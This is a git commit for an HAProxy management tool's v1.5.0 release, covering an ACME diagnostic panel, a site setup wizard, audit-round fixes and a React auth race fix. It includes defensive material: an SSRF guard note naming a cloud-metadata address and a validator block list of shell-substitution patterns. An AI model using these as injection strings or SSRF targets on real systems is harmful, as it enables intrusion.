feat: v1.5.0 — Site Wizard (Issue #14) + ACME Diagnostic Panel (Issue #13)

Closes #13, Closes #14.

This release squashes the v1.4.0 → v1.5.0 development line. v1.4.0
shipped the ACME stability & enterprise audit (Issues #10/#11/#12).
v1.5.0 builds on that foundation with two co-equal headline features
plus a 22-round audit campaign hardening the prior configuration
surface. License remains MIT for v1.5.0 (relicense to AGPL-3.0
lands in v1.5.2).

------------------------------------------------------------------
HEADLINE FEATURE A — ACME Diagnostic Panel (Issue #13)
------------------------------------------------------------------
A live pre-flight + post-failure diagnostic surface for every ACME
order, reachable from the ACME Automation page. The panel exists
to make ACME failures legible to operators who do NOT have shell
access to the API host.

Endpoints (`backend/routers/acme_diagnostics.py`):
  POST /api/letsencrypt/orders/{order_id}/diagnostics
       Run the full 5-check suite (DNS / port-80 / routing /
       account / agents) and humanize the order's `error_detail`
       (>=11 RFC-8555 problem types, backwards compatible with
       legacy plain-string failures).
  POST /api/letsencrypt/orders/{order_id}/diagnostics/
                                {check_id}/rerun
       Re-run a single check in place — used by the "Re-run"
       button on every row of the modal's pre-flight table.
  GET  /api/letsencrypt/orders/{order_id}/events
       Merged event timeline combining the typed
       `acme_order_events` rows with correlated
       `user_activity_logs` entries (resource_type =
       'letsencrypt_order' AND resource_id = order_id). The
       diagnostic modal auto-tails this timeline every 5 seconds
       while open.

Service-level checks (`backend/services/acme_diagnostics.py`):
  * DNS resolution via stdlib socket.gethostbyname_ex through
    run_in_executor (intentionally avoiding an aiodns runtime
    dep for v1.5.0).
  * Port-80 HEAD probe, target locked to the order's domains,
    success on HTTP 200 OR 404, warns on egress timeout
    (corp egress policies routinely blackhole outbound 80 —
    fail-hard would be too noisy).
  * SSRF guard: probe refuses non-public IPs and surfaces the
    skip in the diagnostic result; IPv4-mapped IPv6 normalisation
    closes the `::ffff:169.254.169.254` cloud-metadata vector.
  * HAProxy routing presence check: matches the order's
    cluster_ids to a port-80 HTTP frontend.
  * ACME account validity check against `letsencrypt_accounts`.
  * Agent presence check (>=1 active agent in target cluster).
  * Every sub-check wrapped in a wall-clock timeout to bound
    impact on the API event loop.

RBAC: ssl.read for run, ssl.read for events. Per-user 5/min rate
limit on both run and rerun, backed by the (user_id, action,
created_at DESC) composite index.

Frontend (`frontend/src/components/ACMEAutomation.js`):
  * "Diagnose" button on every order row + the existing
    "stuck order" warning row.
  * Modal with two tabs:
    - Pre-flight Checks (Antd Table with status pills + Re-run
      buttons + humanized error banner)
    - Event Log (Antd Timeline with auto-tail polling, scroll-
      to-bottom, pause-on-hover)
  * Correlation IDs surfaced in error banners and individual
    check fail details for backend-log lookup.

------------------------------------------------------------------
HEADLINE FEATURE B — Site Setup Wizard (Issue #14)
------------------------------------------------------------------
A single guided flow that creates a Backend + Servers + HTTP
Frontend (and optional HTTPS Frontend) in one atomic transaction.

Endpoints (`backend/routers/site_wizard.py`):
  POST /api/site-wizard/preview     — diff-preview the changeset
  POST /api/site-wizard/create      — atomic execute
  POST /api/site-wizard/reject      — clean rollback (including
                                       any wizard_staged ACME
                                       orders)
  GET  /api/site-wizard/drafts      — draft persistence
  PUT  /api/site-wizard/drafts/{id} — save/update
  DELETE /api/site-wizard/drafts/{id}

Feature surface:
  * One screen captures both backend (mode + servers) AND
    frontend (http + optional https + SSL mode) inputs.
  * SSL modes: ACME (new order, HTTP-01 only for v1.5.0),
    Upload (existing PEM), Existing (link to a stored cert),
    or None.
  * ACME-staged path: wizard_staged_until watermark on the
    `letsencrypt_orders` row defers finalisation until agent
    confirmation; per-mode reject cleanly cancels and rolls
    back the staged order.
  * Live diff preview against the cluster's current generated
    config (renderer-evolution noise stripped — track-sc<N>
    dedup, per-server cookie strip, defaults-cookie
    inheritance, listen-block flattening).
  * Draft persistence with PEM stripped at save time (private
    keys never round-trip through the drafts table).
  * Per-cluster multi-tenancy: drafts and wizard_staged orders
    are isolated to the creating user's cluster scope.

Frontend (`frontend/src/components/SiteWizard.js`):
  * 4-step Antd Steps flow: Backend → Frontend → SSL → Review.
  * Render the live diff preview inline before commit.
  * Antd Form-level validation mirrors backend Pydantic
    validators (numeric bounds, HAProxy reserved keywords, ALPN
    consistency, IPv6 scope-id, domain regex, server name
    dedup).

------------------------------------------------------------------
AUDIT CAMPAIGN — Rounds 1 → 22 (Bulgu #1 → #82)
------------------------------------------------------------------
v1.5.0 includes 22 adversarial review passes. Each round produced
its own commit set in the corporate development line; this squash
collapses those into the v1.5.0 release artefact. Highlights:

  Round 1-4   Site Wizard core: dry-run parity, single-line
              value injection guard, ACL -f pattern-file block,
              SSL parity, timeout regex, form-state pin.
  Round 5-7   defaults-cookie inheritance, server-named-cookie
              guard, fe/be mode mismatch, duplicate server
              names, health_check_uri + server_address
              validators.
  Round 8-10  cookie_name / cookie_options newline-injection
              guard, dry-run parity (round 9), TCP-mode HTTP-only
              feature blockers.
  Round 11    SSL name path traversal + health-check >= 1.
  Round 12-13 SSL & ACME deep dive (Bulgu #23-#32).
  Round 14    single-line value injection (Bulgu #33).
  Round 15-17 ACME multi-tenant UX, numeric bounds, HAProxy
              reserved keywords, ALPN/TLS consistency,
              all-backup, multi-domain & multi-user enterprise
              edges, drain/HSTS/post-completion (Bulgu
              #34-#53).
  Round 18-21 concurrency, agent state, TCP-mode HTTP-only,
              list size caps, IPv6 scope-id, preview account
              validation, TCP backend + balance uri reject
              (Bulgu #54-#61).
  Round 22    FE error visibility + 3x stale-data lockouts,
              referential integrity + cascade safety,
              authentication & authorization, multi-cluster
              isolation, apply_pending_changes concurrency,
              script injection + bulk import multi-tenancy,
              prefix-stripped signature comparison
              (Bulgu #62-#82).

------------------------------------------------------------------
NO CORPORATE-SPECIFIC ARTIFACTS
------------------------------------------------------------------
This squash deliberately sanitises corporate hostnames, container
registry references, and TLS secret names into generic
placeholders (`your-registry.example.com/your-org`,
`haproxy-openmanager*.example.com`, `wildcard-tls`,
`taylanbakircioglu/haproxy-openmanager-*`) so the public artefact
contains no internal infrastructure detail. Pilot / development
history that retained those values stays in the corporate fork
and is NOT part of this commit.
This commit is contained in:
taylanbakircioglu
2026-05-14 00:04:19 +03:00
parent 07942a82e8
commit 668d14082f
141 changed files with 61670 additions and 771 deletions
+1
View File
@@ -61,3 +61,4 @@ jobs:
taylanbakircioglu/haproxy-openmanager-frontend:latest
taylanbakircioglu/haproxy-openmanager-frontend:${{ steps.version.outputs.TAG }}
taylanbakircioglu/haproxy-openmanager-frontend:${{ steps.prodversion.outputs.VERSION }}
+2
View File
@@ -26,6 +26,8 @@ __pycache__/
.Python
env/
venv/
.venv/
.venv-*/
ENV/
env.bak/
venv.bak/
+745
View File
@@ -249,6 +249,8 @@ This architecture provides better security (no inbound connections to HAProxy se
- **External Account Binding (EAB)**: Support for CAs that require EAB (ZeroSSL, Google Trust Services)
- **Structured Error Diagnostics** *(v1.4.0)*: All ACME failures (challenge, finalize, download) persist structured JSON to `letsencrypt_orders.error_detail` for clear post-mortem analysis
- **Audit Logging** *(v1.4.0)*: Every ACME operation (request, revoke, CA-chain import, account ops) is captured in `user_activity_logs` for compliance review
- **ACME Diagnostic Panel** *(v1.5.0 — Issue #13)*: Live pre-flight + post-failure diagnostics (DNS / port-80 / routing / account / agents) and merged event timeline (`acme_order_events` + correlated `user_activity_logs`) accessible from the ACME Automation page; humanized error rendering for 11+ RFC8555 problem types with backwards-compatible fallback for legacy plain-string `error_detail`; per-user 5/min rate-limit
- **New Site Setup Wizard** *(v1.5.0 — Issue #14)*: Single guided flow that creates a Backend + Servers + HTTP Frontend (and optional HTTPS Frontend with chosen SSL mode: ACME / Upload / Existing / None) in one atomic transaction, with diff preview, draft persistence (PEM stripped), and ACME-staged order completion gated by agent confirmation. Per-mode reject path cleanly rolls back including any wizard-staged ACME orders.
- **Backward Compatible**: ACME-managed and manually uploaded certificates coexist seamlessly; existing SSL workflows are completely unaffected
#### Integration & API
@@ -2195,4 +2197,747 @@ Developed with ❤️ for the HAProxy community
---
## Release Notes
### v1.5.0 — ACME Diagnostics & Site Wizard
#### Highlights
- **Issue #13: ACME Diagnostic Panel.** From the ACME Automation list, click the new `Diagnose` button (or the order's status tag) to launch a Modal with three Tabs:
1. **Pre-flight Checks** — DNS resolution, port-80 reachability, HAProxy routing, ACME account status, agent health. Each check has its own `Re-run` button.
2. **Event Log** — Merged timeline of typed `acme_order_events` rows (added in v1.5.0) and correlated `user_activity_logs` entries; auto-tails every 5s while the order is in `pending`/`processing`.
3. **Raw Error** — Humanized error display covering 11+ RFC8555 problem types (`badNonce`, `caa`, `connection`, `rateLimited`, `unauthorized`, ...) with full backwards compatibility for legacy plain-string `error_detail`.
- **Issue #14: New Site Setup Wizard.** A single guided flow (`/sites/new`) that creates a Backend + Servers + HTTP Frontend (and optional HTTPS Frontend) in one atomic transaction. SSL choice supports four modes:
- `acme` — defers HTTPS frontend creation to a deferred `post_completion_actions` block on a wizard-staged ACME order; the order is promoted to a real LE call only after the agent confirms the gating `bulk-site-create-{ts}` config version (legacy `bulk-proxied-host-create-{ts}` is still recognised by the reject path for historical APPLIED versions).
- `upload` — uploads PEM cert+key in the same transaction.
- `existing` — reuses an admin-uploaded cert and ensures the cluster junction is set.
- `none` — HTTP-only host.
The wizard ships with the same visual ACL rule builder used by the standalone Frontend Management page (Routing & ACLs section on the Frontend step) so operators define `acl` / `use_backend` / `redirect` rules from cluster-scoped backend dropdowns instead of free-text HAProxy directives. Drafts persist for 30 days with PEM material stripped at rest. Reject of the wizard's PENDING version cleanly rolls back ALL wizard entities (backends, servers, frontend(s), SSL row if any, AND the wizard-staged `letsencrypt_orders` row).
#### Migration Release Notes
This release adds **idempotent** migrations only — no destructive schema changes:
- New columns on `letsencrypt_orders`:
- `post_completion_actions JSONB` (deferred actions for wizard ACME mode)
- `wizard_staged_until TIMESTAMPTZ` (24h timeout for wizard-staged orders)
- `pending_apply_version_name VARCHAR(255)` + partial index `WHERE status='wizard_staged'`
- `created_by INTEGER REFERENCES users(id) ON DELETE SET NULL`
- New tables: `acme_order_events` (typed event log, 90d retention), `wizard_drafts` (30d retention).
- New composite index `idx_user_activity_logs_user_action_time` for the per-user-per-minute rate-limit COUNT(*) used by both new features.
The `letsencrypt_orders.status` column has no CHECK constraint; the new `wizard_staged` value coexists with all existing statuses (`pending`, `ready`, `processing`, `valid`, `invalid`, ...).
The reject path's force-delete fallback now also covers `entity_type='letsencrypt_order'` snapshots so wizard-staged ACME orders are removed when their parent PENDING version is rejected.
#### Rollback Considerations
- **Forward compatibility (v1.5.0 → future).** All new columns/tables are additive; older code paths that do not know about them are unaffected.
- **Backward rollback (v1.5.0 → v1.4.0).** The new columns/tables remain in the database harmlessly; v1.4.0 simply ignores them. Wizard-staged ACME orders that were never promoted to `pending` will not progress on v1.4.0 (the v1.4.0 background task does not select `status='wizard_staged'`); admins can either:
1. Wait for the 24h `wizard_staged_until` timeout to fire (v1.5.0 only) — only relevant if rolling back temporarily, OR
2. Manually `DELETE FROM letsencrypt_orders WHERE status='wizard_staged'` and re-run the wizard once you re-deploy v1.5.0.
- **Wizard ACME failure scenarios.** If the agent never confirms the gating config version (e.g. agent down), the wizard-staged ACME order will time out and transition to `status='invalid'` after 24h with `error_detail='wizard staged timeout (>24h with no agent confirm)'` — surfaced in the new Diagnostic Panel.
- **Drafts.** PEM material is server-side stripped from `wizard_drafts.payload`; rolling back will not leak keys at rest.
#### v1.5.x — Site Wizard module rename + ACL UX parity
A non-breaking follow-up to v1.5.0 that retires the internal "Proxied Host" namespace in favour of "Site" everywhere it used to leak into operators' workflow:
- **Module file rename.** `backend/routers/proxied_host.py` and `backend/models/proxied_host.py` are now `site_wizard.py`. The Pydantic class `ProxiedHostCreate` (and its sibling `ProxiedHostPreflightAcme` / `ProxiedHostDraftCreate`) was renamed to `SiteCreate` etc. with a module-level alias `ProxiedHostCreate = SiteCreate` so existing imports keep working.
- **API URL prefix rename.** The wizard now mounts at `/api/sites/*` (canonical). The legacy `/api/proxied-hosts/*` slug is preserved as a hidden `308 Permanent Redirect` alias on `main.py`, so external integrators keep working through the redirect during the transition window. The frontend axios calls all target `/api/sites/*` directly.
- **Audit-log version-name rename.** Wizard-applied versions now carry the prefix `bulk-site-create-{ts}`. The cluster reject path on `cluster.py` recognises BOTH the new prefix and the legacy `bulk-proxied-host-create-{ts}` so historical APPLIED versions still clean up.
- **Activity-log action + resource_type.** The wizard's explicit `log_user_activity` call now writes `action='wizard_create_site'` and `resource_type='site'` (was `wizard_create_proxied_host` / `proxied_host`). Older audit rows already in the database keep their pre-rename strings.
- **Rate-limit dual-name aliasing.** The wizard's per-user-per-minute rate-limit (`COUNT(*)` over `user_activity_logs`) now passes `ANY($::text[])` so it counts BOTH the canonical `site_*` action_name and its legacy `proxied_host_*` companion. A deploy that lands mid-minute cannot reset the quota, and the limit cannot be bypassed by an attacker who picks the legacy name.
- **DB schema rebrand (Phase I).** The `wizard_drafts.wizard_type` column's schema-level `DEFAULT` flipped from `'proxied_host'` to `'site'`. New rows land with the canonical value via an explicit `INSERT … VALUES ($1, 'site', …)`. The list / cap / cluster-delete-purge queries all filter on `wizard_type IN ('site', 'proxied_host')` so pre-rebrand drafts owned by the same user remain visible and remain rejectable. **Existing rows are NOT row-rewritten** — the migration is a metadata-only `ALTER TABLE … SET DEFAULT 'site'` that takes a non-blocking lock and is idempotent.
- **Wizard ACL UX parity.** The Frontend step now embeds the same `ACLRuleBuilder` component used by the Frontend Management page, with cluster-scoped existing backends populated automatically and the wizard's brand-new backend surfaced as a virtual entry in the use_backend dropdown. Drafts persist the three rule arrays so a resumed draft hydrates with the same routing config.
Backward compatibility is preserved at every layer: the DB-level `wizard_drafts.wizard_type='proxied_host'` enum value (still valid for pre-rebrand rows), the `LEGACY_WIZARD_DRAFT_SESSION_KEY` browser sessionStorage key, frontend route aliases (`/proxied-hosts/new`, `/proxied-hosts/drafts`), and the legacy `/api/proxied-hosts/*` URL all keep working.
##### Phase J — UI mount-time race fix ("clusters don't appear after deploy")
**Reported symptom.** After every rolling deploy, operators saw the cluster
selector empty for "a long time" — closing and re-opening the browser did
not help, but waiting ~30s did. The user diagnosed it as a UI problem.
**Root cause.** A React mount-time race between `<AuthProvider>` (parent)
and `<ClusterProvider>` (child). React's useEffect commit phase fires
CHILD effects before PARENT effects, so `ClusterProvider.useEffect` —
which dispatches the very first `axios.get('/api/clusters')` — ran BEFORE
`AuthProvider.useEffect` set `axios.defaults.headers.common['Authorization']`.
The first request went out un-authenticated → backend returned 401 →
ClusterContext's `catch` block silently committed `clusters=[]`. The
operator-visible UI rendered "no clusters" until the 30-second
auto-refresh interval re-fired the request, by which point auth had
hydrated and the call succeeded. Restarting the browser kept hitting the
same race because localStorage carried the token but the useEffect
ordering was identical.
**Fix (3 layers of defence).**
1. **`src/index.js` module-level axios bootstrap.** Runs before
`<App />` is rendered, so no React tree (and therefore no useEffect)
can fire before it. Synchronously seeds
`axios.defaults.headers.common['Authorization']` from localStorage
AND installs an `axios.interceptors.request` that re-reads the token
on every outbound request. The interceptor is the belt-and-suspenders
defence — it cannot be raced by mount ordering and survives any
future code path that mutates `axios.defaults`.
2. **`AuthContext` synchronous useState lazy initialisers.** The
`_hydrateAuthSync` helper runs during the AuthProvider RENDER phase,
which precedes ANY child useEffect. It reads localStorage and seeds
`loading=false`, `isAuthenticated=true`, and the user object —
eliminating the post-mount async hydration that produced the race.
3. **`ClusterContext` auth-gate + exponential-backoff retry.** The
first fetch is gated on `isAuthenticated && !authLoading`, and a
transient 5xx / network failure now triggers up to 4 fast retries
(1s, 2s, 4s, 8s — total ~15s) instead of immediately blanking the
cluster list and depending on the 30s auto-refresh interval. 401/403
intentionally do NOT retry (re-auth is the user's job). The previous
cluster list is preserved on transient hiccups so periodic refreshes
no longer flash an "empty state".
**Verification.** 22 static-source pin tests in
`backend/tests/test_frontend_auth_bootstrap_phase_j.py` cover all three
layers (bootstrap order, AuthContext lazy init, ClusterContext retry +
auth-gate) plus the six audit-loop hotfixes below. 590 backend tests
pass; frontend `npm run build` clean.
**Operator-visible outcome.** After deploy, the cluster selector
populates on the FIRST fetch — no 30-second wait. A transient kube-proxy
convergence window collapses to a few seconds (covered by retries) instead
of being masked by the 30-second interval.
##### Phase J audit hotfixes (audit fix #2 → #6)
Successive audit loops surfaced six follow-on issues that each
reproduced one or more of the original symptoms in narrower windows.
Each fix is pinned in the same Phase J pin-test file:
- **Audit fix #2 — stale closure in `fetchClusters`.** Wrapping
`fetchClusters` in `useCallback(…, [])` froze `selectedCluster` at
its mount-time value (`null`), so the 30-second auto-refresh
reported stale agent-health data forever. Bridged via
`selectedClusterRef`, updated in a passive effect, and read inside
the callback.
- **Audit fix #3 — missing `setLoading(true)` on the auth-gated
first fetch.** During the login flow, the ClusterContext effect
fired with `loading=false` (the initial value), so the cluster
selector briefly rendered "No Cluster Selected" before the spinner
came back. Now the effect explicitly seeds `setLoading(true)` when
the auth gate flips open.
- **Audit fix #4 — `loading=false` between retry waves.** The
`finally` clause unconditionally released the loading flag, so the
spinner blinked off between each backoff attempt and the UI
flashed "No Cluster Selected" for up to ~15 seconds — the very
symptom Phase J was meant to eliminate. The release is now gated
on `retryTimerRef.current === null` so the spinner stays on across
the entire retry budget.
- **Audit fix #5 — exhausted retry budget left counter at 4.**
`retryAttemptRef` was reset only on a successful fetch and on the
auth-gate transition. After 4 transient failures in a row the
counter stayed at 4 for the rest of the session, so any subsequent
invocation (the 30s background refresh, an explicit refetch from a
mutator like `deleteCluster`) skipped the retry pattern entirely
on the first transient failure. The settle-into-empty-state branch
now resets the counter so each fresh invocation gets a full retry
budget.
- **Audit fix #6 — page-content "No Cluster Selected" during the
fetch window.** The cluster selector itself already showed a
spinner via `loading`, but page-level components
(`SSLManagement`, `Configuration`, `DashboardV2`,
`BulkConfigImport`, `BulkVersionHistory`) checked
`!selectedCluster` directly and rendered a permanent warning
affordance. During the 15-second retry budget the page therefore
read as "you forgot to pick a cluster" even though the cluster
list was simply still being fetched. Each page now also consumes
`loading: clustersLoading` from `useCluster()` and shows a neutral
"Loading clusters…" affordance until the fetch settles, only then
flipping to the warning. This is the fix that fully closes the
user-visible loop on the original "clusters don't appear after
deploy" report.
##### Phase K — Site Wizard validation hardening + UX simplification
Operators reported that completing the wizard and clicking **Create &
Apply** repeatedly surfaced opaque 422 errors at the final step:
```
HTTP→HTTPS redirect cannot be combined with custom redirect rules.
body -> frontend -> acl_rules -> 0: Input should be a valid dictionary
body -> frontend -> use_backend_rules -> 0: Input should be a valid dictionary
```
Root causes (each fixed by Phase K):
1. **Contract mismatch on rule fields.** `ACLRuleBuilder.js`
serialised ACL / use_backend / redirect rules as `string[]` while
`FrontendStep` typed them as `List[dict]`. Every wizard POST
carrying a single ACL rule failed Pydantic validation. The
downstream renderer in `services/haproxy_config.py` had always
expected strings, so the schema mismatch was the stale side.
2. **Step 2 mutex was advisory only.** The
`https_redirect ⊕ redirect_rules` validator existed at the model
level but the wizard let the operator advance through Step 2 → 3 →
4 with the conflict in place, only to be punted back at Create.
3. **No HAProxy validation before Create.** `/api/sites/preview`
only checked collisions; the real validator ran inside the
`create_site` transaction *after* entity inserts. Operators
discovered errors at apply time.
4. **HTTPS step overcrowded.** 11 SSL bind-line knobs flat on Step 3
without a defaults summary or any visible grouping.
**What changed**
- **Phase A — Backend contract + safety validators**
(`backend/models/site_wizard.py`).
- `acl_rules`, `use_backend_rules` are now `List[str]`.
`redirect_rules` stays `List[Union[str, dict]]` to preserve the
structured-redirect path used by the renderer's
`_format_redirect_rule`.
- Per-element safety validators reject embedded newlines (HAProxy
directive injection prevention), shell-substitution patterns
(`system`, `exec`, `eval`, `$(`, backtick — same set the
manual frontend API has been blocking since pre-R14), 4 KB
string limit, and empty / whitespace-only strings.
- Two new cross-field model validators close silent-bug gaps:
`FrontendStep.reject_tcp_mode_with_https_redirect` (the renderer
used to emit an HTTP-only directive into a TCP frontend) and
`SSLChoice.reject_inverted_tls_versions` (when both `ssl_min_ver`
and `ssl_max_ver` are set, reject `min > max`).
- **Phase B — Step 2 hard-block + TCP-mode guard**
(`SiteWizard.js`, `ACLRuleBuilder.js`).
- The Step 2 Next handler now hard-blocks the
`https_redirect ⊕ redirect_rules` and `mode='tcp' ⊕
https_redirect` combinations with one-click resolve buttons
("Disable HTTP→HTTPS switch" / "Remove redirect rules").
- Switching the frontend to TCP mode auto-clears `https_redirect`;
the Switch is also `disabled` while `mode==='tcp'` with an
explanatory tooltip.
- `ACLRuleBuilder` accepts a new `disableRedirectRules` prop that
visually disables the Redirect Rules section (`aria-disabled`,
greyed-out cards, tooltip) when the parent passes
`https_redirect=true`. The rules data stays in component state
so toggling the switch off restores them.
- **Phase C — Real HAProxy dry-run gate before Create**
(`backend/routers/site_wizard.py`, `SiteWizard.js`).
- New shared helper `_synthesize_candidate_haproxy_config(body,
conn, *, entities_already_inserted)` is used by both
`create_site` (post-insert validation gate) and a new dry-run
path on `POST /api/sites/preview`. Two callsites pinned by
`test_phase_k_create_site_and_preview_use_same_synthesis_helper`
so the apply gate and the dry-run gate cannot silently desync.
- `POST /api/sites/preview` now accepts an optional
`validate_haproxy_config=true` query param. When set, the
endpoint runs `HAProxyConfigValidator` against the synthesised
candidate config and returns a `validation: {is_valid,
error_count, warning_count, errors, warnings, infos}` block in
the same 200 OK envelope. Validator crashes return
`is_valid: null` + `validator_error` (matches `create_site`'s
non-fatal posture). The dry-run path is rate-limited at 5/min
via `_enforce_rate_limit` and emits structured ENTER/EXIT
`logger.info` lines for telemetry. Legacy preview callers
(`SiteDrafts.handlePreview`) are unaffected — they pass no flag.
- The wizard auto-fires the dry-run on Step 4 entry with an
`AbortController` so rapid Step 4 → Step 2 → Step 4 navigation
cancels the in-flight request. A six-state validation card
renders inline: idle / loading / clean (green) /
`warnings_only` (yellow) / `errors` (red, blocks Create) /
`pydantic_error` (red, body-parse failures from Phase A's new
validators or PEM-stripped resume drafts) / `unavailable`
(orange, advisory — Create stays enabled to mirror the
validator-crash-is-non-fatal contract). Each error /
`pydantic_error` row gets an `Edit Step N` jumpback button via
a static directive→step + loc→step mapping table.
- Audit-fix #1 (post-implementation review): the wizard also
resets `dryRunResult.status` to `idle` whenever the operator
leaves Step 4. The ACL builder lives outside the antd Form
so its mutations don't fire `Form.onValuesChange`; without
this reset a stale `clean`/`errors`/`warnings_only` status
survives Step 4 → Step 2 (ACL edit) → Step 4 round-trips
and the auto-fire branch suppresses the next fetch. With
the reset every Step 4 entry triggers a fresh dry-run
(rate-limit-safe — entry is operator-initiated, not
programmatic).
- Audit-fix #2 (post-implementation review): the
`Edit Step N` jumpback now also resolves the target step
from the error **message text** when `loc` cannot pinpoint
it. Pydantic v2 raises `model_validator(mode="after")`
errors with `loc=()`; FastAPI prepends `'body'` so the
operator-visible envelope is `loc=['body']` (length 1).
The legacy `_locPathToStep` early-returned null for this
case, dropping the jumpback for PEM-stripped resume
("ssl.mode='upload' requires a non-empty PEM-encoded
certificate_content …") and every
`enforce_acme_apply_and_http` cross-field rejection. A
small ordered pattern table recovers the step from the
failure message text so operators always get a working
"fix-from-here" button.
- Audit-fix #2 round 3 (post-implementation review): the
pattern table is ordered so cross-field ACME messages
route to the step the operator must EDIT to fix the
error, not the step that "feels related". A naive ordering
("SSL first because every cross-field message starts with
`ssl.mode='acme'`") would route every cross-field hit to
Step 3, defeating the jumpback. Order is now:
`apply_immediately` (Step 4) → `wildcard`/`domains` (Step
0) → `frontend.*`/`bind_port` (Step 2) → `backend.*` (Step
1) → SSL catch-all (Step 3, LAST). With this ordering,
"ssl.mode='acme' requires apply_immediately=true" routes
to Step 4 (toggle the switch), "ssl.mode='acme' requires
frontend.bind_port=80" routes to Step 2 (edit FE port),
and "(HTTP-01) cannot issue wildcard certs" routes to
Step 0 (remove wildcard). PEM-stripped and other SSL-only
errors still hit Step 3 via the final catch-all.
- Audit-fix #2 round 4 (post-implementation review): the
pydantic_error renderer no longer emits a stray
`<strong>: </strong>` orphan-colon prefix when the failing
error has no field path. SiteCreate-level model_validator
errors land with `loc=['body']` (length 1); after dropping
the leading `'body'` marker the joined path is empty.
Pre-fix the renderer wrapped that empty string in
`<strong>...: </strong>`, producing a visually broken " : "
prefix in front of every PEM-stripped resume message and
every `enforce_acme_apply_and_http` cross-field rejection.
Post-fix the strong/colon prefix renders only when a real
field path exists.
- **Phase D — HTTPS step simplification + UI parity**
(`SiteWizard.js`).
- TLS bounds (`ssl_min_ver`, `ssl_max_ver`) and the HSTS quartet
stay first-class on the SSL step; rarely-used knobs
(`https_bind_port`, `https_frontend_name_suffix`, `ssl_alpn`,
`ssl_ciphers`, `ssl_ciphersuites`, `ssl_strict_sni`,
`ssl_verify`) move into a nested **Advanced TLS settings
(rarely needed)** Collapse that defaults to closed. A read-only
summary line ("Port 443, ALPN h2,http/1.1, …") shows the safe
defaults that apply unless overridden.
- The Advanced Collapse auto-opens (`defaultActiveKey`) when a
saved draft has any non-default value, so resumed drafts
surface their custom tuning instead of silently hiding it.
- HSTS UI parity for the Phase A
`reject_hsts_preload_without_hsts` validator: the
`hsts_preload` Switch is `disabled` until HSTS is enabled,
`max-age ≥ 31536000`, AND `includeSubDomains=true`.
`hsts_max_age` and `hsts_include_subdomains` are also disabled
while `hsts_enabled=false`.
- TLS min/max ordering UI parity: the `ssl_min_ver` /
`ssl_max_ver` Selects use Antd `dependencies` + a custom
validator that rejects min > max client-side with the same
wording the Phase A model validator uses.
**Backward compatibility**
- The existing `/api/sites` POST envelope is unchanged.
- The existing `/api/sites/preview` POST envelope gains an optional
`validation` field that legacy callers can ignore. The
`validate_haproxy_config` flag defaults to `false`, so
`SiteDrafts.handlePreview` and any external integrators keep
their pre-Phase K behaviour.
- `redirect_rules` retains its `List[Union[str, dict]]` shape, so
any historical caller (or saved draft) that used the structured
dict form continues to work.
- The Pydantic safety validators (`system`, `exec`, `eval`, `$(`,
backtick) match the manual frontend API's existing
`validate_acl_rules` posture, which has been in production
blocking the same substrings since pre-R14 with no operator
complaint. No existing wizard payload that previously round-
tripped through `services/haproxy_config.py` can be rejected by
these new validators.
- The `_synthesize_candidate_haproxy_config` helper in
`entities_already_inserted=True` mode is functionally identical
to the previous inline `generate_haproxy_config_for_cluster`
call inside `create_site`. The refactor is pure DRY plumbing.
##### Rollback considerations (Phase K)
If you must roll back to a pre-Phase-K v1.5.x build:
- **Saved drafts** with the new `acl_rules: List[str]` shape are
forward- and backward-compatible: the legacy build also expected
string elements at the renderer level, the rejection only ever
happened at the wizard model boundary. Operators on the legacy
build hit the same 422 the new build is fixing — no DB rewrite
needed.
- **`/api/sites/preview` `validation` block** is a new optional
field; legacy frontend callers ignore unknown fields. The
`validate_haproxy_config` query param default is `false`, so
legacy callers do not exercise the dry-run branch.
- **No DB migrations** are introduced by Phase K. The
`frontends.acl_rules` / `redirect_rules` / `use_backend_rules`
JSONB columns remain unchanged.
##### Phase K Phase D — Operator-feedback follow-ups (Bulgu #1–#6)
Operator review of the Phase A–C release surfaced six additional
issues. Each is rooted in a UX inconsistency or a residual stuck
state, and the fixes converge on a "single source of truth + ref-
based dry-run lifecycle" architecture:
- **Bulgu #1 — Cluster scope.** Pre-fix Step 0 had its own cluster
Select dropdown decoupled from the header. Operators routinely
picked cluster A in the header and cluster B in the wizard with
zero visual signal that the wizard would target a different
cluster than every other tool. Phase D pipes the wizard through
the SAME `ClusterContext` that FrontendManagement / BackendServers
/ SSLManagement consume, hides Step 0's `cluster_id` `Form.Item`,
and replaces the picker with a read-only `<Tag>` display + hint
to change cluster via the header. A `useEffect` keeps
`form.cluster_id` synchronised with `selectedCluster.id` so mid-
wizard header changes propagate; the existing cluster-transition
cleanup effect handles cert-id orphan reconciliation. Resume from
a draft that targets a different cluster now auto-swaps the
header cluster (best-effort `selectCluster()` call) so post-
resume edits stay cluster-consistent.
- **Bulgu #2 — SSL CA bundle dropdown filter.** Backend's
`BackendServers.js` filters the CA-bundle Select with
`?usage_type=server`, so operators only see certs imported with
the right purpose. The wizard pre-fix surfaced EVERY cert in the
cluster regardless of usage, letting an operator submit a payload
that apply-time HAProxy would parse-error on (`unable to load
SSL private key`). Phase D filters explicitly:
* Per-server CA bundle Select → `usage_type === 'server'`.
* SSL & ACME step's "Existing certificate" Select →
`usage_type === 'frontend'`.
The empty-state Alert was also updated to reason about only the
filtered list so a cluster with N server-side certs but zero
frontend certs renders the "no certs imported" hint correctly.
- **Bulgu #3 — Stuck "Validating against HAProxy…".** The root
cause was a self-cancel race in the auto-fire `useEffect`. The
effect deps array included `dryRunResult.status`, and the effect
body called `setDryRunResult({status: 'loading'})` at the top.
The status change re-triggered the effect; React's cleanup of the
previous run fired BEFORE the new body, aborting the in-flight
controller; the new body returned early because `status !==
'idle'`; the aborted fetch's `.catch` block detected
`signal.aborted` and returned without setting state. Status
stayed `'loading'` forever. Audit-fix #1 (round 1) had addressed
the leave-Step-4 cleanup branch but the enter-Step-4 self-abort
was a separate failure mode that only surfaced on a real backend.
Phase D switches the lifecycle to a ref-driven model:
* `dryRunStatusRef` shadows the latest status (synced via a
passive `useEffect`).
* `dryRunInvalidationTick` is the external re-trigger channel;
`onValuesChange` bumps it when the operator edits a Step-4-
visible field (e.g. the Apply Immediately switch).
* The main effect's deps array drops `dryRunResult.status` and
becomes `[step, form, aclBuilderData, dryRunInvalidationTick]`
— none of these change on a self-issued setDryRunResult, so
the self-cancel race is structurally impossible.
* Cleanup nulls the abort ref only if it still points to the
torn-down controller, so a fresh fetch's ref is never
accidentally cleared.
- **Bulgu #4 — Preview missing fields.** The /api/sites/preview
response previously echoed only a sparse subset of fields, so the
SiteDrafts Preview modal could not show whether per-server
timings, backend cookie persistence, frontend maxconn, HSTS, or
